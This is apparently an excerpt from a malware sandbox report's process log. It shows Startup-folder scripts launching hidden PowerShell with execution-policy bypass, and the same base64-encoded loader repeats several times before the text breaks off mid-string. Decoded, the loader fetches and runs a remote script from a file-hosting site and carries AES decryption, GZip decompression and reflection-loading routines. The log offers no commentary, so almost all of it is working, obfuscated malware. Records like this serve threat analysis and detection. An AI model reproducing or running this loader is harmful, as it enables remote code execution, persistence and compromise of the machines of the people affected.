"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBl